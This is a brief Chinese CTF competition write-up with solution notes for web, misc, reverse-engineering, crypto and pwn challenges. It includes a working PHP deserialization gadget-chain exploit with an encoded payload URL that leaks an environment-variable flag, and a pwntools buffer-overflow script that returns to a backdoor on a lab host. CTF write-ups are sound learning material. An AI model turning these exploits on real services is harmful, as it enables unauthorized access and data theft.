第一次线下拿第一，比赛不戳，茶歇针多啊

web

dino

打游戏拿10000分给flag

前端发现api.php，aes解密发送score

拿到key和iv加密发包

ezphp

exp:

<?php
class SensitiveData{
    public function __toString(){
        echo "Sensitive Data Accessed<br>";
        return getenv("FLAG")."<br>";
    }
}

class Logger{
    public $log;
    public function __wakeup()
    {
        echo "<br>Logger Initialized<br>";
        var_dump($this->log);
    }
}

class DataProcessor{
    public $data;
    public $processor;
    public $errorHandler;
    public function __debugInfo()
    {
        $this->errorHandler = new ErrorHandler();
        echo "Processing Data<br>";
        if($this->data){
            echo $this->processor;
        }else{
            echo ($this->errorHandler)();
        }
    }
}

$B=new DataProcessor();
$B->data=1;
$B->processor=new SensitiveData();
$A=new Logger();
$A->log = $B;
echo urlencode(serialize($A));

payload

http://10.240.0.11:10559/?data=O%3A6%3A%22Logger%22%3A1%3A%7Bs%3A3%3A%22log%22%3BO%3A13%3A%22DataProcessor%22%3A3%3A%7Bs%3A4%3A%22data%22%3Bi%3A1%3Bs%3A9%3A%22processor%22%3BO%3A13%3A%22SensitiveData%22%3A0%3A%7B%7Ds%3A12%3A%22errorHandler%22%3BN%3B%7D%7D

recover

/backup下有个压缩包

查看环境变量发现unzip_pwd=afsa76as7ad

Test Your Hamburger

根据提示改http头

misc

Welcome

黑神话：悟空

png改宽高

数据库

flag头base64加密

直接搜

ez data recovery

发现base64信息

解密发现是elf文件

逆一下，确定有连接

运行

ss查看tcp连接

合规文档

word中清除所有格式
key

vi

enc

des解密

re

checkin

简单换表

Rev02

nop掉花指令

F5

异或用的box是固定的，输入1111111111111111111111111111111拿到box

得到passwd

md发现原来passwd不是flag，那不直接改eip秒了，你妹的

crypto

XOR

xor爆破一下

pwn

backdoor

0x100溢出

给了后门

from pwn import*
p=remote("10.240.0.11","11115")
payload=b'a'*72+p64(0x401216)
p.send(payload)
p.interactive()